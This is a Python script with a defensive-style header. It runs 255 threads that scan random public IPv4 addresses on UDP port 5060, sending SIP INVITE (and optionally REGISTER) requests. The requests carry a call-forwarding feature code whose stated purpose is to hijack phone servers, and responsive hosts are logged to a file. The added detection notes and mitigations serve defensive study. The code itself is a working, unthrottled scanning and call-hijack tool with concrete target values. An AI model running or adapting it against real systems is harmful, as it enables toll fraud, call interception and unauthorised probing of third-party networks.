# Analysis summary (from the code below):
#   * Opens one UDP socket bound to local port 5060 and starts 255 threads.
#   * Each thread loops forever: it picks a pseudo-random IPv4 address, sends a
#     SIP payload built from a template file to <address>:5060, waits up to
#     `timeout` seconds for one datagram, and appends the probed address to
#     /sdcard/sip.txt when the reply contains "100 ", "180 " or "200 ".
#   * The dialled number placed in the payload is a USSD-style call-forwarding
#     string (`phoneno`).
#
# Observable indicators for detection (all taken from the constants below):
#   * UDP source port 5060 -> destination port 5060, from one source to many
#     unrelated destinations, with no pacing (`ratelimit` is 0).
#   * SIP user "SELFCHECK", realm "asterisk", display names "James"/"Herbert".
#   * A dial string that starts with "*" and ends with "#" in the request.
#   * SDP body advertising audio port 49172, PCMU/8000.
#
# Mitigations on the receiving side: restrict UDP/5060 to known peers, require
# authentication before processing INVITE, reject feature-code dial strings
# ("*...#") from unauthenticated sources, and alert on high-fan-out SIP sources.
import socket
import random
import select
import threading
import time

#IP data
servip="9.39.195.80" #reuse ipaddr for target sip server in order to hijack
myip="70.67.16.106"  # substituted for the MYIP placeholder (SDP origin / connection address)
port=5060  # used both as the local bind port and as the destination port

#INVITE data
name="James"
nameto="Herbert"
phoneno="*61*16043308323#" #hijack via call forwarding USSD code

#REGISTER data
enableregister=0 #enable registering but most servers no longer support it
username="SELFCHECK" #default username
realm="asterisk" # default www authentication realm

#SIP data
# SDP-style body (v=, o=, s=, c=, t=, m=, a= lines) that still contains the
# PHONENO and MYIP placeholders; they are filled in by findReplace() below.
sipdata="v=0\no="+nameto+" PHONENO PHONENO IN IP4 MYIP\ns=-\nc=IN IP4 MYIP\nt=0 0\nm=audio 49172 RTP/AVP 0\na=rtpmap:0 PCMU/8000\nport="+str(port)

#timeout and rate limiting options
timeout=0.3 # seconds to wait for a reply (0.3 s = 300 ms; the original note said 370 ms)
ratelimit=0 # seconds slept after each probe; 0 means no pause

def findReplace(data, ip):
    """Return `data` with the template placeholders replaced by module values.

    Placeholders are plain substrings replaced in the order written:
    SIPDATA, PHONENO, MYIP, SERVIP, IPADDR (the `ip` argument), PHONENO again,
    CONTLEN (character length of `sipdata`), PORT, NAME, NAMTO, USER, REALM.
    Because these are substring replacements, any occurrence of a placeholder
    word inside the template is rewritten, not just whole tokens.
    """
    return data.replace("SIPDATA", sipdata).replace("PHONENO", phoneno).replace("MYIP", myip).replace("SERVIP", servip).replace("IPADDR", ip).replace("PHONENO", phoneno).replace("CONTLEN", str(len(sipdata))).replace("PORT", str(port)).replace("NAME", name).replace("NAMTO", nameto).replace("USER", username).replace("REALM" ,realm)

# Resolve the placeholders inside the SDP body itself once, up front.
sipdata=findReplace(sipdata, servip)

#open sip data file for reading
# The two request templates are not part of this file; fdata1 is only sent
# when `enableregister` is set, fdata2 is sent on every probe.
# NOTE(review): presumably fdata1 is a REGISTER and fdata2 an INVITE template,
# going by the section names above; confirm against the template files.
f=open("/sdcard/SIPSCAN1.txt", "r")
fdata1=f.read()
f.close()
f=open("/sdcard/SIPSCAN2.txt", "r")
fdata2=f.read()
f.close()

# Single UDP socket shared by every thread, bound to all interfaces on `port`.
s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("", port))

def recvDatShiz(s):
    """Wait up to `timeout` seconds for one datagram on `s`.

    Returns (data, addr) for a datagram of at most 4096 bytes, or
    (b'', '0.0.0.0') when nothing arrived or any exception occurred
    (the bare `except` hides the cause).
    """
    try:
        s.setblocking(0)
        ready = select.select([s], [], [], timeout)
        if ready[0]:
            data, addr = s.recvfrom(4096)
            return data, addr
    except:
        pass
    return b'', '0.0.0.0'

def dataCheck(data, ip):
    """Log `ip` when `data` contains "100 ", "200 " or "180 ".

    A match prints the raw reply and the address, then appends the address to
    /sdcard/sip.txt. The byte patterns are matched anywhere in the datagram,
    not only in the status line. Returns `data` unchanged.
    """
    if data!=b'':
        if b"100 " in data or b"200 " in data or b"180 " in data: # check for auth or ringing
            print(data)
            print(ip)
            f=open("/sdcard/sip.txt", "a")
            f.write(ip+"\n")
            f.close()
    return data

def scanThread(fdata1, fdata2):
    """Probe loop run by each worker thread; never returns.

    Each iteration builds a dotted-quad string (first octet 1-222, other
    octets 0-254), skips it when the string starts with "0", "127", "192",
    "172" or "10.", sends the filled-in template(s) to that address on `port`,
    and hands any reply that is not rejected by the keyword filter to
    dataCheck().
    """
    while 1:
        ip=str(random.randrange(1,223))+"."+str(random.randrange(0,255))+"."+str(random.randrange(0,255))+"."+str(random.randrange(0,255))
        # String-prefix test: drops every 127.x, 192.x, 172.x and 10.x address.
        if ip.startswith("0") or ip.startswith("127") or ip.startswith("192") or ip.startswith("172") or ip.startswith("10."):
            continue
        try:
            if enableregister:
                s.sendto(findReplace(fdata1, ip).encode(), (ip, port))
                data, addr = recvDatShiz(s)
                if b"Unauthorized" in data or b"Illegal" in data or b"404" in data or "480" in data or data==b'':
                    continue
                dataCheck(data, ip)
            s.sendto(findReplace(fdata2, ip).encode(), (ip, port))
            # NOTE(review): `addr` from the reply is discarded and the socket is
            # shared by all threads, so the address later written to sip.txt is
            # the one this thread just probed, not necessarily the sender of the
            # datagram that was read.
            data, addr = recvDatShiz(s)
            #if data!=b"":
            #    print(data)
            if b"Unauthorized" in data or b"Illegal" in data or b"404" in data or b"480" in data or data==b'':
                continue
            dataCheck(data, ip)
        except Exception as e:
            # Any error for this address is dropped silently and the loop moves on.
            #print(str(e))
            continue
        time.sleep(ratelimit)

# 255 non-daemon threads, each running the endless probe loop above, so the
# process does not exit on its own.
for i in range(0, 255):
    threading.Thread(target=scanThread, args=(fdata1,fdata2,)).start()